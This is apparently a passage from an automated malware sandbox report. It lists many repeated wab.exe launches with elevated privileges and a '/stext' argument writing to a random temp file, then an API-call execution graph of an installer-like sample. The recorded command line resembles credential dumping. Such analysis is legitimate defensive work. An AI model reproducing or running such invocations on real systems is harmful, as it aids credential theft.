                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x7ff726ad0000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:41
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:42
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:43
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:44
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:20.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16.8%
                                                        Total number of Nodes:1384
                                                        Total number of Limit Nodes:26
                                                        execution_graph 4038 4047c0 4039 4047d8 4038->4039 4046 4048f2 4038->4046 4043 404601 22 API calls 4039->4043 4040 40495c 4041 404a26 4040->4041 4042 404966 GetDlgItem 4040->4042 4048 404668 8 API calls 4041->4048 4044 404980 4042->4044 4045 4049e7 4042->4045 4047 40483f 4043->4047 4044->4045 4053 4049a6 SendMessageW LoadCursorW SetCursor 4044->4053 4045->4041 4054 4049f9 4045->4054 4046->4040 4046->4041 4049 40492d GetDlgItem SendMessageW 4046->4049 4051 404601 22 API calls 4047->4051 4052 404a21 4048->4052 4071 404623 KiUserCallbackDispatcher 4049->4071 4056 40484c CheckDlgButton 4051->4056 4075 404a6f 4053->4075 4058 404a0f 4054->4058 4059 4049ff SendMessageW 4054->4059 4055 404957 4072 404a4b 4055->4072 4069 404623 KiUserCallbackDispatcher 4056->4069 4058->4052 4063 404a15 SendMessageW 4058->4063 4059->4058 4063->4052 4064 40486a GetDlgItem 4070 404636 SendMessageW 4064->4070 4066 404880 SendMessageW 4067 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40489d GetSysColor 4066->4068 4067->4052 4068->4067 4069->4064 4070->4066 4071->4055 4073 404a59 4072->4073 4074 404a5e SendMessageW 4072->4074 4073->4074 4074->4040 4078 405ca8 ShellExecuteExW 4075->4078 4077 4049d5 LoadCursorW SetCursor 4077->4045 4078->4077 4079 402643 4080 402672 4079->4080 4081 402657 4079->4081 4083 4026a2 4080->4083 4084 402677 4080->4084 4082 402d89 21 API calls 4081->4082 4092 40265e 4082->4092 4086 402dab 21 API calls 4083->4086 4085 402dab 21 API calls 4084->4085 4088 40267e 4085->4088 4087 4026a9 lstrlenW 4086->4087 4087->4092 4096 4066a4 WideCharToMultiByte 4088->4096 4090 402692 lstrlenA 4090->4092 4091 4026ec 4092->4091 4095 4026d6 4092->4095 4097 406253 SetFilePointer 4092->4097 4093 406224 WriteFile 4093->4091 4095->4091 4095->4093 4096->4090 4098 406287 4097->4098 4099 40626f 4097->4099 4098->4095 4100 4061f5 ReadFile 4099->4100 4101 40627b 4100->4101 4101->4098 4102 406290 SetFilePointer 4101->4102 4103 4062b8 SetFilePointer 4101->4103 4102->4103 4104 40629b 4102->4104 4103->4098 4105 406224 WriteFile 4104->4105 4105->4098 3554 403645 SetErrorMode GetVersionExW 3555 4036d1 3554->3555 3556 403699 GetVersionExW 3554->3556 3557 403728 3555->3557 3558 406a76 5 API calls 3555->3558 3556->3555 3559 406a06 3 API calls 3557->3559 3558->3557 3560 40373e lstrlenA 3559->3560 3560->3557 3561 40374e 3560->3561 3562 406a76 5 API calls 3561->3562 3563 403755 3562->3563 3564 406a76 5 API calls 3563->3564 3565 40375c 3564->3565 3566 406a76 5 API calls 3565->3566 3567 403768 #17 OleInitialize SHGetFileInfoW 3566->3567 3642 406682 lstrcpynW 3567->3642 3570 4037b7 GetCommandLineW 3643 406682 lstrcpynW 3570->3643 3572 4037c9 3573 405f7e CharNextW 3572->3573 3574 4037ef CharNextW 3573->3574 3584 403801 3574->3584 3575 403903 3576 403917 GetTempPathW 3575->3576 3644 403614 3576->3644 3578 40392f 3580 403933 GetWindowsDirectoryW lstrcatW 3578->3580 3581 403989 DeleteFileW 3578->3581 3579 405f7e CharNextW 3579->3584 3582 403614 12 API calls 3580->3582 3654 4030d5 GetTickCount GetModuleFileNameW 3581->3654 3585 40394f 3582->3585 3584->3575 3584->3579 3588 403905 3584->3588 3585->3581 3587 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3585->3587 3586 40399d 3594 405f7e CharNextW 3586->3594 3625 403a44 3586->3625 3633 403a54 3586->3633 3589 403614 12 API calls 3587->3589 3740 406682 lstrcpynW 3588->3740 3592 403981 3589->3592 3592->3581 3592->3633 3598 4039bc 3594->3598 3596 403ba2 3599 405ce2 MessageBoxIndirectW 3596->3599 3597 403bc6 3600 403c4a ExitProcess 3597->3600 3601 403bce GetCurrentProcess OpenProcessToken 3597->3601 3602 403a1a 3598->3602 3603 403a5d 3598->3603 3605 403bb0 ExitProcess 3599->3605 3606 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 3601->3606 3607 403c1a 3601->3607 3741 406059 3602->3741 3757 405c4d 3603->3757 3606->3607 3608 406a76 5 API calls 3607->3608 3611 403c21 3608->3611 3615 403c36 ExitWindowsEx 3611->3615 3617 403c43 3611->3617 3615->3600 3615->3617 3616 403a7c 3619 403a85 3616->3619 3639 403a94 3616->3639 3620 40140b 2 API calls 3617->3620 3761 406682 lstrcpynW 3619->3761 3620->3600 3621 403a39 3756 406682 lstrcpynW 3621->3756 3624 403aba wsprintfW 3626 4066bf 21 API calls 3624->3626 3684 403d54 3625->3684 3626->3639 3629 403b30 SetCurrentDirectoryW 3807 406442 MoveFileExW 3629->3807 3630 403af6 GetFileAttributesW 3631 403b02 DeleteFileW 3630->3631 3630->3639 3631->3639 3814 403c62 3633->3814 3636 406442 40 API calls 3636->3639 3637 4066bf 21 API calls 3637->3639 3639->3624 3639->3629 3639->3630 3639->3633 3639->3636 3639->3637 3640 403bb8 CloseHandle 3639->3640 3641 4069df 2 API calls 3639->3641 3762 405bd6 CreateDirectoryW 3639->3762 3765 405c30 CreateDirectoryW 3639->3765 3768 405d8e 3639->3768 3811 405c65 CreateProcessW 3639->3811 3640->3633 3641->3639 3642->3570 3643->3572 3645 406930 5 API calls 3644->3645 3647 403620 3645->3647 3646 40362a 3646->3578 3647->3646 3648 405f51 3 API calls 3647->3648 3649 403632 3648->3649 3650 405c30 2 API calls 3649->3650 3651 403638 3650->3651 3823 4061a1 3651->3823 3827 406172 GetFileAttributesW CreateFileW 3654->3827 3656 403118 3683 403125 3656->3683 3828 406682 lstrcpynW 3656->3828 3658 40313b 3829 405f9d lstrlenW 3658->3829 3662 40314c GetFileSize 3663 403246 3662->3663 3682 403163 3662->3682 3664 403033 36 API calls 3663->3664 3665 40324f 3664->3665 3667 40328b GlobalAlloc 3665->3667 3665->3683 3835 4035fd SetFilePointer 3665->3835 3666 4035e7 ReadFile 3666->3682 3668 4032a2 3667->3668 3673 4061a1 2 API calls 3668->3673 3670 4032e3 3671 403033 36 API calls 3670->3671 3671->3683 3672 40326c 3674 4035e7 ReadFile 3672->3674 3675 4032b3 CreateFileW 3673->3675 3677 403277 3674->3677 3678 4032ed 3675->3678 3675->3683 3676 403033 36 API calls 3676->3682 3677->3667 3677->3683 3834 4035fd SetFilePointer 3678->3834 3680 4032fb 3681 403376 48 API calls 3680->3681 3681->3683 3682->3663 3682->3666 3682->3670 3682->3676 3682->3683 3683->3586 3685 406a76 5 API calls 3684->3685 3686 403d68 3685->3686 3687 403d80 3686->3687 3688 403d6e 3686->3688 3689 406550 3 API calls 3687->3689 3851 4065c9 wsprintfW 3688->3851 3690 403db0 3689->3690 3692 403dcf lstrcatW 3690->3692 3694 406550 3 API calls 3690->3694 3693 403d7e 3692->3693 3836 40402a 3693->3836 3694->3692 3697 406059 18 API calls 3698 403e01 3697->3698 3699 403e95 3698->3699 3701 406550 3 API calls 3698->3701 3700 406059 18 API calls 3699->3700 3702 403e9b 3700->3702 3708 403e33 3701->3708 3703 403eab LoadImageW 3702->3703 3704 4066bf 21 API calls 3702->3704 3705 403f51 3703->3705 3706 403ed2 RegisterClassW 3703->3706 3704->3703 3710 40140b 2 API calls 3705->3710 3709 403f08 SystemParametersInfoW CreateWindowExW 3706->3709 3739 403f5b 3706->3739 3707 403e54 lstrlenW 3712 403e62 lstrcmpiW 3707->3712 3713 403e88 3707->3713 3708->3699 3708->3707 3711 405f7e CharNextW 3708->3711 3709->3705 3714 403f57 3710->3714 3716 403e51 3711->3716 3712->3713 3717 403e72 GetFileAttributesW 3712->3717 3715 405f51 3 API calls 3713->3715 3718 40402a 22 API calls 3714->3718 3714->3739 3719 403e8e 3715->3719 3716->3707 3720 403e7e 3717->3720 3722 403f68 3718->3722 3852 406682 lstrcpynW 3719->3852 3720->3713 3721 405f9d 2 API calls 3720->3721 3721->3713 3724 403f74 ShowWindow 3722->3724 3725 403ff7 3722->3725 3727 406a06 3 API calls 3724->3727 3844 4057da OleInitialize 3725->3844 3729 403f8c 3727->3729 3728 403ffd 3730 404001 3728->3730 3731 404019 3728->3731 3732 403f9a GetClassInfoW 3729->3732 3734 406a06 3 API calls 3729->3734 3737 40140b 2 API calls 3730->3737 3730->3739 3733 40140b 2 API calls 3731->3733 3735 403fc4 DialogBoxParamW 3732->3735 3736 403fae GetClassInfoW RegisterClassW 3732->3736 3733->3739 3734->3732 3738 40140b 2 API calls 3735->3738 3736->3735 3737->3739 3738->3739 3739->3633 3740->3576 3854 406682 lstrcpynW 3741->3854 3743 40606a 3855 405ffc CharNextW CharNextW 3743->3855 3746 403a26 3746->3633 3755 406682 lstrcpynW 3746->3755 3747 406930 5 API calls 3753 406080 3747->3753 3748 4060b1 lstrlenW 3749 4060bc 3748->3749 3748->3753 3750 405f51 3 API calls 3749->3750 3752 4060c1 GetFileAttributesW 3750->3752 3751 4069df 2 API calls 3751->3753 3752->3746 3753->3746 3753->3748 3753->3751 3754 405f9d 2 API calls 3753->3754 3754->3748 3755->3621 3756->3625 3758 406a76 5 API calls 3757->3758 3759 403a62 lstrlenW 3758->3759 3760 406682 lstrcpynW 3759->3760 3760->3616 3761->3639 3763 405c22 3762->3763 3764 405c26 GetLastError 3762->3764 3763->3639 3764->3763 3766 405c44 GetLastError 3765->3766 3767 405c40 3765->3767 3766->3767 3767->3639 3769 406059 18 API calls 3768->3769 3770 405dae 3769->3770 3771 405db6 DeleteFileW 3770->3771 3772 405dcd 3770->3772 3773 405f04 3771->3773 3774 405eed 3772->3774 3861 406682 lstrcpynW 3772->3861 3773->3639 3774->3773 3781 4069df 2 API calls 3774->3781 3776 405df3 3777 405e06 3776->3777 3778 405df9 lstrcatW 3776->3778 3780 405f9d 2 API calls 3777->3780 3779 405e0c 3778->3779 3782 405e1c lstrcatW 3779->3782 3784 405e27 lstrlenW FindFirstFileW 3779->3784 3780->3779 3783 405f12 3781->3783 3782->3784 3783->3773 3785 405f16 3783->3785 3784->3774 3792 405e49 3784->3792 3786 405f51 3 API calls 3785->3786 3787 405f1c 3786->3787 3788 405d46 5 API calls 3787->3788 3791 405f28 3788->3791 3790 405ed0 FindNextFileW 3790->3792 3793 405ee6 FindClose 3790->3793 3794 405f42 3791->3794 3795 405f2c 3791->3795 3792->3790 3805 405e91 3792->3805 3862 406682 lstrcpynW 3792->3862 3793->3774 3797 405707 28 API calls 3794->3797 3795->3773 3798 405707 28 API calls 3795->3798 3797->3773 3800 405f39 3798->3800 3799 405d8e 64 API calls 3799->3805 3802 406442 40 API calls 3800->3802 3801 405707 28 API calls 3801->3790 3803 405f40 3802->3803 3803->3773 3804 405707 28 API calls 3804->3805 3805->3790 3805->3799 3805->3801 3805->3804 3806 406442 40 API calls 3805->3806 3863 405d46 3805->3863 3806->3805 3808 403b3f CopyFileW 3807->3808 3809 406456 3807->3809 3808->3633 3808->3639 3871 4062c8 3809->3871 3812 405ca4 3811->3812 3813 405c98 CloseHandle 3811->3813 3812->3639 3813->3812 3815 403c73 CloseHandle 3814->3815 3816 403c7d 3814->3816 3815->3816 3817 403c91 3816->3817 3818 403c87 CloseHandle 3816->3818 3905 403cbf 3817->3905 3818->3817 3821 405d8e 71 API calls 3822 403b95 OleUninitialize 3821->3822 3822->3596 3822->3597 3824 4061ae GetTickCount GetTempFileNameW 3823->3824 3825 4061e4 3824->3825 3826 403643 3824->3826 3825->3824 3825->3826 3826->3578 3827->3656 3828->3658 3830 405fab 3829->3830 3831 405fb1 CharPrevW 3830->3831 3832 403141 3830->3832 3831->3830 3831->3832 3833 406682 lstrcpynW 3832->3833 3833->3662 3834->3680 3835->3672 3837 40403e 3836->3837 3853 4065c9 wsprintfW 3837->3853 3839 4040af 3840 4040e3 22 API calls 3839->3840 3842 4040b4 3840->3842 3841 403ddf 3841->3697 3842->3841 3843 4066bf 21 API calls 3842->3843 3843->3842 3845 40464d SendMessageW 3844->3845 3850 4057fd 3845->3850 3846 405824 3847 40464d SendMessageW 3846->3847 3848 405836 OleUninitialize 3847->3848 3848->3728 3849 401389 2 API calls 3849->3850 3850->3846 3850->3849 3851->3693 3852->3699 3853->3839 3854->3743 3856 406019 3855->3856 3860 40602b 3855->3860 3858 406026 CharNextW 3856->3858 3856->3860 3857 40604f 3857->3746 3857->3747 3858->3857 3859 405f7e CharNextW 3859->3860 3860->3857 3860->3859 3861->3776 3862->3792 3864 40614d 2 API calls 3863->3864 3865 405d52 3864->3865 3866 405d61 RemoveDirectoryW 3865->3866 3867 405d69 DeleteFileW 3865->3867 3868 405d73 3865->3868 3869 405d6f 3866->3869 3867->3869 3868->3805 3869->3868 3870 405d7f SetFileAttributesW 3869->3870 3870->3868 3872 4062f8 3871->3872 3873 40631e GetShortPathNameW 3871->3873 3898 406172 GetFileAttributesW CreateFileW 3872->3898 3875 406333 3873->3875 3876 40643d 3873->3876 3875->3876 3877 40633b wsprintfA 3875->3877 3876->3808 3879 4066bf 21 API calls 3877->3879 3878 406302 CloseHandle GetShortPathNameW 3878->3876 3880 406316 3878->3880 3881 406363 3879->3881 3880->3873 3880->3876 3899 406172 GetFileAttributesW CreateFileW 3881->3899 3883 406370 3883->3876 3884 40637f GetFileSize GlobalAlloc 3883->3884 3885 4063a1 3884->3885 3886 406436 CloseHandle 3884->3886 3887 4061f5 ReadFile 3885->3887 3886->3876 3888 4063a9 3887->3888 3888->3886 3900 4060d7 lstrlenA 3888->3900 3891 4063c0 lstrcpyA 3894 4063e2 3891->3894 3892 4063d4 3893 4060d7 4 API calls 3892->3893 3893->3894 3895 406419 SetFilePointer 3894->3895 3896 406224 WriteFile 3895->3896 3897 40642f GlobalFree 3896->3897 3897->3886 3898->3878 3899->3883 3901 406118 lstrlenA 3900->3901 3902 406120 3901->3902 3903 4060f1 lstrcmpiA 3901->3903 3902->3891 3902->3892 3903->3902 3904 40610f CharNextA 3903->3904 3904->3901 3906 403ccd 3905->3906 3907 403c96 3906->3907 3908 403cd2 FreeLibrary GlobalFree 3906->3908 3907->3821 3908->3907 3908->3908 3915 4015c6 3916 402dab 21 API calls 3915->3916 3917 4015cd 3916->3917 3918 405ffc 4 API calls 3917->3918 3919 4015d6 3918->3919 3920 401636 3919->3920 3921 405f7e CharNextW 3919->3921 3928 405c30 2 API calls 3919->3928 3929 405c4d 5 API calls 3919->3929 3932 4015ff 3919->3932 3933 40161c GetFileAttributesW 3919->3933 3922 401668 3920->3922 3923 40163b 3920->3923 3921->3919 3926 401423 28 API calls 3922->3926 3935 401423 3923->3935 3931 401660 3926->3931 3928->3919 3929->3919 3930 40164f SetCurrentDirectoryW 3930->3931 3932->3919 3934 405bd6 2 API calls 3932->3934 3933->3919 3934->3932 3936 405707 28 API calls 3935->3936 3937 401431 3936->3937 3938 406682 lstrcpynW 3937->3938 3938->3930 3939 